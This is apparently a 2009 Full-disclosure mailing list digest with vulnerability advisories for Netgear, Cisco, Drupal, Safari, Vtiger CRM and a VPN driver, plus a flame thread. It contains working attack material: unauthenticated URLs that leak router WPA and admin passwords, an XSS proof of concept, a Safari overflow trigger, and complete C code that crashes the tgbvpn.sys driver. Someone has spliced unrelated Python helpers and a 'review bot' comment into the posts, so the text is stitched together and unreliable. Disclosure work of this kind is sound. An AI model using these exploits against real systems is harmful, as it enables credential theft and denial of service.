Internet Security Suite r5  10.0.0.217

Solution

CA Internet Security Suite r3:
Upgrade to Internet Security Suite r5 and apply the latest updates.

CA Internet Security Suite r4 32 bit,
CA Internet Security Suite r5 32 bit:

Ensure automatic update is enabled and once updated, confirm the
version as described in the How to determine if the installation is
affected section.

References

CVE-2009-0682 - vetmonnt.sys IOCTL crash
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0682

CA20090818-02: Security Notice for CA Internet Security Suite
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214673

Acknowledgement

CVE-2009-0682 - Nikita Tarakanov, Positive Technologies Research Team

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Support at
http://support.ca.com/

If you discover a vulnerability in CA products, please report your
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Kevin Kotas
CA Product Vulnerability Response Team




Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread Sub
don't feed the troll ;)

Andrew Kuriger schrieb:
> Dude really?
>
> Nice signature: "Be Yourself @ mail.com!
> Choose From 200+ Email Addresses
> Get a Free Account at www.mail.com!"
>
> Nobody cares. I just find it funny.
>
> On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer" 
> wrote:
>   
>> List,
>>
>> Below are (malice) false statements about my client.
>>
>> Thu Jul 16 13:54:34 BST 2009 
>>
>> ureleet at gmail.com 
>>
>> "n3td3v is posting as ant-sec"
>>
>> "he is hacking and spreading disinformation on
>> full-d."
>>
>> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
>>
>> Sun Jul 26 02:40:47 BST 2009
>>
>> antisecav at hushmail.com 
>>
>> "Breaking: antisec and n3td3v responsible for Matasano hacking"
>>
>> "n3td3v/antisec is proud to announce official 
>> partnership with antisec ("the scene")"
>>
>> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
>>
>> some...@lawyer.com
>> 
>



Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread Andrew Kuriger
Dude really?

Nice signature: "Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!"

Nobody cares. I just find it funny.

On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer" 
wrote:
> List,
> 
> Below are (malice) false statements about my client.
> 
> Thu Jul 16 13:54:34 BST 2009 
> 
> ureleet at gmail.com 
> 
> "n3td3v is posting as ant-sec"
> 
> "he is hacking and spreading disinformation on
> full-d."
> 
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
> 
> Sun Jul 26 02:40:47 BST 2009
> 
> antisecav at hushmail.com 
> 
> "Breaking: antisec and n3td3v responsible for Matasano hacking"
> 
> "n3td3v/antisec is proud to announce official 
> partnership with antisec ("the scene")"
> 
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
> 
> some...@lawyer.com



[Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread someone lawyer
List,

Below are (malice) false statements about my client.

Thu Jul 16 13:54:34 BST 2009 

ureleet at gmail.com 

"n3td3v is posting as ant-sec"

"he is hacking and spreading disinformation on
full-d."

http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html

Sun Jul 26 02:40:47 BST 2009

antisecav at hushmail.com 

"Breaking: antisec and n3td3v responsible for Matasano hacking"

"n3td3v/antisec is proud to announce official 
partnership with antisec ("the scene")"

http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html

some...@lawyer.com

-- 
Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!



[Full-disclosure] Information disclosure on Netgear WNR2000

2009-08-18 Thread Jean Trolleur
There are several minor vulnerabilities on the Netgear WNR2000 wireless
router running firmware 1.2.0.8.

1. Unauthenticated disclosure of the WPA/WPA2 password. Simply
request without authentication:

http://netgear/router-info.htm
http://netgear/cgi-bin/router-info.htm

The router will respond with:

DeviceID:WNR2000;
HardwareVersion:;
FirmwareVersion:V1.2.0.8NA;
WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf

2. Unauthenticated disclosure of the administrator password. Simply
request without authentication:

http://netgear/cgi-bin/NETGEAR_WNR2000.cfg

Skip the first 128 bytes and you have a tar dump of the filesystem.
Reverse engineering the weak admin password authentication scheme
is left as an exercise to the reader.

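Added example, not part of the post above: a Python parser for the `router-info.htm` response format the post shows, with a helper that reports which sensitive fields a device returns, so an owner can confirm from a captured response whether their unit discloses credentials before and after a firmware update. The response body is the sample from the post, embedded as a constructed string; the list of field names treated as sensitive is an assumption made for the example.

```python
# Constructed sample: the response body quoted in the post, embedded so the
# parser can be exercised offline without touching any device.
SAMPLE_ROUTER_INFO = (
    "DeviceID:WNR2000;\n"
    "HardwareVersion:;\n"
    "FirmwareVersion:V1.2.0.8NA;\n"
    "WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf\n"
)

# Assumption for the example: field names whose presence in an unauthenticated
# response should be treated as a credential leak.
SENSITIVE_KEYS = {"WPAPassPhrase", "WEPKey", "AdminPassword"}


def parse_router_info(body: str) -> dict:
    """Parse 'Key:Value;' lines into a dict.

    A value that itself consists of 'k=v;' pairs (as WLAN-Security does in the
    sample) is returned as a nested dict. Empty values are kept as ''.
    """
    info = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")   # split on the FIRST colon only
        value = value.rstrip(";")
        if "=" in value:
            nested = {}
            for pair in value.split(";"):
                k, _, v = pair.partition("=")
                if k:
                    nested[k.strip()] = v.strip()
            info[key.strip()] = nested
        else:
            info[key.strip()] = value.strip()
    return info


def leaked_secrets(info: dict) -> list:
    """Return the names of sensitive fields present with a non-empty value,
    searching both top-level and nested entries."""
    found = []
    for key, value in info.items():
        if isinstance(value, dict):
            found.extend(k for k, v in value.items() if k in SENSITIVE_KEYS and v)
        elif key in SENSITIVE_KEYS and value:
            found.append(key)
    return found


if __name__ == "__main__":
    parsed = parse_router_info(SAMPLE_ROUTER_INFO)
    print("device:", parsed.get("DeviceID"), "firmware:", parsed.get("FirmwareVersion"))
    print("sensitive fields returned without authentication:", leaked_secrets(parsed))
```

Feed the function the body of a response you captured from your own device; an empty list from `leaked_secrets` after an update is the result you want to see.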


[Full-disclosure] Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR Software Border Gateway Protocol Vulnerability

2009-08-18 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR
Software Border Gateway Protocol Vulnerability

Advisory ID: cisco-sa-20090818-bgp

http://www.cisco.com/warp/public/707/cisco-sa-20090818-bgp.shtml

Revision 1.0

For Public Release 2009 August 18 1500 UTC (GMT)

- -

Summary
===

Cisco IOS XR will reset a Border Gateway Protocol (BGP) peering
session when receiving a specific invalid BGP update.

The vulnerability manifests when a BGP peer announces a prefix with a
specific invalid attribute. On receipt of this prefix, the Cisco IOS
XR device will restart the peering session by sending a notification.
The peering session will flap until the sender stops sending the
invalid/corrupt update.

This is a different vulnerability from the one disclosed in the Cisco
Security Advisory "Cisco IOS Software Border Gateway Protocol 4-Byte
Autonomous System Number Vulnerabilities", published on 2009 July
29 1600 UTC at the following link: 

http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml

Cisco is preparing to release a free software maintenance upgrade (SMU)
that addresses this vulnerability. This advisory will be updated once
the SMU is available.

A workaround that mitigates this vulnerability is available.

This advisory is posted at 

http://www.cisco.com/warp/public/707/cisco-sa-20090818-bgp.shtml

Affected Products
=

This vulnerability affects all Cisco IOS XR software devices after
and including software release 3.4.0 configured with BGP routing.

Vulnerable Products
+--

To determine the Cisco IOS XR Software release that is running on a
Cisco product, administrators can log in to the device and issue the 
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS XR Software by
displaying text similar to "Cisco IOS XR Software". The software
version is displayed after the text "Cisco IOS XR Software".

The following example identifies a Cisco CRS-1 that is running Cisco
IOS XR Software Release 3.6.2:

RP/0/RP0/CPU0:CRS#show version
Tue Aug 18 14:25:17.407 AEST

Cisco IOS XR Software, Version 3.6.2[00]
Copyright (c) 2008 by Cisco Systems, Inc.

ROM: System Bootstrap, Version 1.49(20080319:195807) [CRS-1 ROMMON],

CRS uptime is 4 weeks, 4 days, 1 minute
System image file is "disk0:hfr-os-mbi-3.6.2/mbihfr-rp.vm"

cisco CRS-8/S (7457) processor with 4194304K bytes of memory.
7457 processor at 1197Mhz, Revision 1.2

17 Packet over SONET/SDH network interface(s)
1 DWDM controller(s)
17 SONET/SDH Port controller(s)
8 TenGigabitEthernet/IEEE 802.3 interface(s)
2 Ethernet/IEEE 802.3 interface(s)
1019k bytes of non-volatile configuration memory.
38079M bytes of hard disk.
981440k bytes of ATA PCMCIA card at disk 0 (Sector size 512 bytes).

Configuration register on node 0/0/CPU0 is 0x102
Boot device on node 0/0/CPU0 is mem:


!--- output truncated



The following example identifies a Cisco 12404 router that is running
Cisco IOS XR Software Release 3.7.1:

RP/0/0/CPU0:GSR#show version

Cisco IOS XR Software, Version 3.7.1[00]
Copyright (c) 2008 by Cisco Systems, Inc.

ROM: System Bootstrap, Version 12.0(20051020:160303) SOFTWARE
Copyright (c) 1994-2005 by cisco Systems,  Inc.

GSR uptime is 3 weeks, 6 days, 3 hours, 20 minutes
System image file is "disk0:c12k-os-mbi-3.7.1/mbiprp-rp.vm"

cisco 12404/PRP (7457) processor with 2097152K bytes of memory.
7457 processor at 1266Mhz, Revision 1.2

1 Cisco 12000 Series Performance Route Processor
1 Cisco 12000 Series - Multi-Service Blade Controller
1 1 Port ISE Packet Over SONET OC-48c/STM-16 Controller (1 POS)
1 Cisco 12000 Series SPA Interface Processor-601/501/401
3 Ethernet/IEEE 802.3 interface(s)
1 SONET/SDH Port controller(s)
1 Packet over SONET/SDH network interface(s)
4 PLIM QoS controller(s)
8 FastEthernet/IEEE 802.3 interface(s)
1016k bytes of non-volatile configuration memory.
1000496k bytes of disk0: (Sector size 512 bytes).
65536k bytes of Flash internal SIMM (Sector size 256k).

Configuration register on node 0/0/CPU0 is 0x2102
Boot device on node 0/0/CPU0 is disk0:


!--- output truncated
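As an added example (not part of Cisco's advisory), the following Python script applies the check described above to captured `show version` output: it extracts the release from the "Cisco IOS XR Software, Version" banner line and reports whether the device runs 3.4.0 or later, the first affected release. The sample banners are constructed from the two outputs quoted above plus an invented older release; whether BGP is configured is not visible in the banner, so the caller supplies it as a flag.

```python
import re

# Constructed samples: the banner portion of the two show version outputs
# quoted in the advisory, plus a made-up pre-3.4.0 release.
SAMPLE_BANNERS = {
    "crs": (
        "RP/0/RP0/CPU0:CRS#show version\n"
        "Tue Aug 18 14:25:17.407 AEST\n\n"
        "Cisco IOS XR Software, Version 3.6.2[00]\n"
        "Copyright (c) 2008 by Cisco Systems, Inc.\n"
    ),
    "gsr": (
        "RP/0/0/CPU0:GSR#show version\n\n"
        "Cisco IOS XR Software, Version 3.7.1[00]\n"
        "Copyright (c) 2008 by Cisco Systems, Inc.\n"
    ),
    "old": (
        "RP/0/0/CPU0:LAB#show version\n\n"
        "Cisco IOS XR Software, Version 3.3.3[00]\n"
    ),
}

# Per the advisory: releases from 3.4.0 onward, when BGP routing is configured.
FIRST_AFFECTED = (3, 4, 0)

# The release follows the literal "Cisco IOS XR Software, Version" text; the
# trailing "[00]" build tag is not part of the release and is ignored.
_VERSION_RE = re.compile(r"Cisco IOS XR Software, Version\s+(\d+(?:\.\d+)*)")


def parse_xr_version(banner: str):
    """Return the IOS XR release as a tuple of ints, or None when the banner
    does not identify IOS XR (classic IOS prints 'Cisco IOS Software')."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(banner: str, bgp_configured: bool = True) -> bool:
    """True when the banner shows IOS XR >= 3.4.0 and BGP is configured."""
    ver = parse_xr_version(banner)
    if ver is None or not bgp_configured:
        return False
    padded = ver + (0,) * (3 - len(ver))   # treat "3.6" like "3.6.0"
    return padded >= FIRST_AFFECTED


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        ver = parse_xr_version(banner)
        print(f"{name}: release {'.'.join(map(str, ver))} affected={is_affected(banner)}")
```

Run it against the saved output of `show version` from each router; the BGP flag can be derived from `show running-config router bgp` separately.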



Additional information about Cisco IOS XR software release naming
conventions is available in the "White Paper: Cisco IOS Reference
Guide" at the following link: 

http://www.cisco.com/warp/public/620/1.html#t6

Additional information about Cisco IOS XR software time-based release
model is available in the "White Paper: Guidelines for Cisco IOS XR
Software" at the following link: 

http://www.cisco.com/en/US/prod/coll

[Full-disclosure] Drupal flag module xss vulnerability

2009-08-18 Thread Justin Klein Keane
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Vulnerability Summary Report

Author: Justin C. Klein Keane 
Disclosure URL:
http://lampsecurity.org/drupal-flag-module-vulnerability

Description of Vulnerability:
- - -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL that provides extensibility through various
third party modules.  The Flag module (http://drupal.org/project/flag)
"is a flexible flagging system that is completely customizable by the
administrator. Using this module, the site administrator can provide any
number of flags for nodes, comments, or users. Some possibilities
include bookmarks, marking important, friends, or flag as offensive.
With extensive views integration, you can create custom lists of popular
content or keep tabs on important content."

The Flag module contains a cross site scripting vulnerability because it
does not properly sanitize output of role names before display during
flag creation.

Systems affected:
- - -
Drupal 6.13 with Flag 6.x-1.1 was tested and shown to be vulnerable.

Impact:
- - ---
XSS vulnerabilities may expose site administrative accounts to
compromise which could lead to web server process compromise.

Mitigating factors:
- - ---
The Flag module must be installed.  To carry out a role based XSS
exploit against the module the attacker must be able to inject malicious
role names which requires 'administer permissions' or write access to
the Drupal database.  Only users with permission to 'administer flags'
are affected by this vulnerability.

Proof of Concept:
- -
1.  Install Drupal 6.13
2.  Install Flag 6.x-1.1
3.  Enable the Flag and Flag actions modules from Administer -> Site
building -> Modules
4.  Click the Administer -> User Management -> Roles link
5.  Enter "alert('xss');" in the 'Name' textarea and
click the 'Add role' button
6.  (Note that this triggers an XSS, a vulnerability in 6.13 core)
7.  Click Administer -> Site Building -> Flags
8.  Click the 'Add' tab
9.  Fill in an arbitrary 'Flag name' and click the 'Submit' button
10.  Observe the JavaScript alert


Technical details:
- 
The Flag module fails to sanitize role names on line 708 of
flag.views.inc before display.

Vendor Response:
- -
It is the position of Drupal security that "'administer permissions'
allows arbitrary permission escalation already, so [...] we do not
consider it a security vulnerability."

Patch
- ---
Applying the following patch mitigates these threats.

diff -up flag/flag.module flag_fixed/flag.module
- --- flag/flag.module2009-03-14 02:13:54.0 -0400
+++ flag_fixed/flag.module  2009-08-18 09:23:37.404047187 -0400
@@ -702,10 +702,11 @@ function flag_form(&$form_state, $name,
 $form['roles']['#value'] = $flag->roles;
   }

+  $options = array_map('check_plain', node_get_types('names'));
   $form['types'] = array(
 '#type' => 'checkboxes',
 '#title' => t('What nodes this flag may be used on'),
- -'#options' => node_get_types('names'),
+'#options' => $options,
 '#default_value' => $flag->types,
 '#description' => t('Check any node types that this flag may be
used on. You must check at least one node type.'),
 '#required' => TRUE,
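Review bot: the hunk escapes the wrong list for the vulnerability described above. It wraps `node_get_types('names')` in `check_plain` for the `$form['types']` checkboxes, but the reported issue is unescaped role names, and the only roles code visible in the context, `$form['roles']['#value'] = $flag->roles;`, is left untouched while the roles `#options` are built outside the hunk. Apply the same `array_map('check_plain', ...)` treatment to the `#options` of `$form['roles']`, otherwise a role name containing markup still reaches the flag add form unescaped. Also, the patch text is PGP dash-escaped (`- --- flag/flag.module`, `- -'#options' => node_get_types('names'),`), so it will not apply until the leading `- ` is stripped from those lines.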

- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org



[Full-disclosure] Safari buffer overflow

2009-08-18 Thread Leon Juranic

Three weeks ago, I coded a nice little browser fuzzer, and started 
playing with various browsers: IE, Firefox, Safari, Chrome, Opera... 

I found an interesting Safari crash after a couple of hours of fuzzing.
It was a stack overflow (and a smile on my face). Since then, every now
and then I took some time to play with it. 

Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3.
Among some other vulnerabilities, this vulnerability has also been fixed. 
The Apple announcement is available at
http://lists.apple.com/archives/security-announce/2009/Aug/msg2.html.

Depends on the perspective, but from my own - Very Bad Luck. C'est la vie, 
things like this happen... Some bugs die young.

This simple and interesting vulnerability is located in WebKit's 
JavaScript code that parses floating point numbers. It can be triggered 
with script like this:

-

var Overflow = "31337" + 0.313373133731337313373133731337...;

-

Or something like this...

-

-

Play a little bit with the numbers to get a desirable return address, a 
little bit of heap spraying, and it works. 


Regards,
Leon Juranic





Re: [Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling

2009-08-18 Thread someone lawyer
List,

I ask you not make false statements involving my client.

some...@lawyer.com

- Original Message -
From: ask...@hushmail.com
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] (USA) Fighting the tyranny of fusion centers /   
JTTF harassment and profiling
Date: Fri, 14 Aug 2009 22:47:50 -0500


This post was sponsored heavily by n3td3v intelligence




-- 
Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!



[Full-disclosure] Vtiger CRM 5.0.4 Multiple Vulnerabilities

2009-08-18 Thread ascii
Vtiger CRM 5.0.4 Multiple Vulnerabilities

 Name              Multiple Vulnerabilities in Vtiger CRM
 Systems Affected  Vtiger CRM 5.0.4 and possibly earlier versions
 Severity          Medium
 Impact (CVSSv2)   Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
 Vendor            http://www.vtigercrm.com
 Advisory          http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
 Date              20090818

I. BACKGROUND

Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.

II. DESCRIPTION

Multiple Vulnerabilities exist in Vtiger CRM software.

Some of the technical issues highlighted in this advisory are part of a
wider publication, "PHP filesystem attack vectors - Take Two", and are
generic to applications written in the PHP language:
http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/

III. ANALYSIS

Summary:

 A) Remote Code Execution (RCE) Vulnerability
 B) Cross Site Request Forgery (CSRF) Vulnerabilities
 C) Local File Inclusion (LFI) Vulnerability
 D) Cross Site Scripting (XSS) Vulnerability

A) Remote Code Execution (Windows Only) Vulnerability

A Remote Code Execution vulnerability exists in Vtiger CRM version
5.0.4. In order to exploit this vulnerability an account on the CRM
system is required.

The vulnerability resides in the "Compose Mail" section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is requested and an attachment is specified, the
"saveForwardAttachments" validation routine is called.

This routine involves some security checks to handle uploaded files: it
does blacklist extension checking, and if a bad extension is detected the
txt extension is appended to the file name.

The following is the specific section:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ext_pos = strrpos($binFile, ".");
$ext = substr($binFile, $ext_pos + 1);
if (in_array(strtolower($ext), $upload_badext))
{
$binFile .= ".txt";
}

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's known that in some circumstances (for example when the PHP handler
is configured using AddType/Action/AddHandler globally, e.g. not inside
an Apache Files/FilesMatch directive) blacklisting is not enough, as
files in the form of "filename.php.foo" will be mapped back to PHP
an
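As an added example written for this page (in Python, not Vtiger's own PHP), the block below re-implements the last-extension blacklist check quoted above next to a hardened allowlist variant, and models the Apache handler behaviour the advisory describes, in which a `php` extension token anywhere after the first dot selects the PHP handler regardless of what follows it. The blacklist and allowlist contents are constructed for the example; the advisory does not list `$upload_badext`, and the helper names are my own.

```python
import posixpath
import re

# Constructed for the example: the advisory only says Vtiger keeps a blacklist
# in $upload_badext and does not list it.
UPLOAD_BADEXT = {"php", "php3", "php4", "php5", "phtml", "phps", "cgi", "pl", "exe"}
# Constructed allowlist for the hardened variant.
UPLOAD_GOODEXT = {"txt", "pdf", "png", "jpg", "jpeg", "gif", "csv", "doc", "xls"}


def vtiger_style_name(bin_file: str) -> str:
    """Mirror of the PHP quoted above: inspect only the text after the LAST
    dot and append '.txt' when that single token is blacklisted."""
    ext = bin_file.rsplit(".", 1)[1] if "." in bin_file else ""
    if ext.lower() in UPLOAD_BADEXT:
        return bin_file + ".txt"
    return bin_file


def hardened_name(bin_file: str) -> str:
    """Allowlist variant: strip directory components, keep exactly one
    extension and only if it is allowlisted, and fold every other dot into
    the stem so no 'php' token survives anywhere in the stored name."""
    base = posixpath.basename(bin_file.replace("\\", "/"))
    tokens = base.split(".")
    if len(tokens) > 1 and tokens[-1].lower() in UPLOAD_GOODEXT:
        ext, stem_tokens = tokens[-1].lower(), tokens[:-1]
    else:
        ext, stem_tokens = "txt", tokens          # unknown type: store as text
    stem = "_".join(t for t in stem_tokens if t) or "upload"
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)  # no separators or metachars
    return f"{stem}.{ext}"


def mapped_to_php_handler(name: str) -> bool:
    """Model of the global AddHandler/AddType configuration the advisory
    describes: each extension token is considered, so a 'php' token after the
    first dot maps the file to the PHP handler even with a trailing '.txt'."""
    return any(t.lower() == "php" for t in name.split(".")[1:])


if __name__ == "__main__":
    for upload in ("report.pdf", "shell.php", "shell.php.foo", "../x.php.png"):
        v, h = vtiger_style_name(upload), hardened_name(upload)
        print(f"{upload!r}: blacklist -> {v!r} (php? {mapped_to_php_handler(v)}), "
              f"allowlist -> {h!r} (php? {mapped_to_php_handler(h)})")
```

The point the comparison makes is that appending `.txt` does not change which handler Apache selects when handlers are bound globally; only a name that contains no `php` token at all, as the allowlist variant produces, is safe under that configuration.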

[Full-disclosure] TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local

2009-08-18 Thread evil fingers
Original Advisory Link:
https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php


---[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local Privilege Escalation]->


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
 http://evilcodecave.blogspot.com
 http://evilcodecave.wordpress.com
 http://evilfingers.com
 http://malwareAnalytics.com  [under construction]

Release Date: 15/08/2009

+-+
Product: TheGreenBow VPN Client 4.61.003  (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
 (untested) Local Privilege Escalation

+-+



--[Details]--->

TheGreenBow's tgbvpn.sys driver does not sanitize user-supplied input
(IOCTL), and this leads to a driver collapse that propagates on the
system as a BSOD, with a potential risk of privilege escalation.

Affected IOCTL is 0x8034

Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51
     0x841d36a8


++
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 *          http://evilcodecave.blogspot.com
 *          http://evilcodecave.wordpress.com
 *          http://evilfingers.com
 *          http://malwareAnalytics.com  [under construction]
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    HANDLE hDevice;
    DWORD Junk;

    system("cls");
    printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

    /* Open the driver's device object through the Win32 device namespace. */
    hDevice = CreateFileA("\\\\.\\tgbvpn",
                          0,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          NULL,
                          OPEN_EXISTING,
                          0,
                          NULL);

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n Unable to open Device Driver\n");
        return EXIT_FAILURE;
    }

    /* Issue IOCTL 0x8034 with bogus buffer pointers and zero-length buffers;
     * the driver uses the request without validating it and faults (BSOD). */
    DeviceIoControl(hDevice, 0x8034, (LPVOID) 0x8001, 0, (LPVOID) 0x8002, 0,
                    &Junk, (LPOVERLAPPED) NULL);

    CloseHandle(hDevice);
    return EXIT_SUCCESS;
}

++

Regards,
Giuseppe 'Evilcry' Bonfa'
www.EvilFingers.com 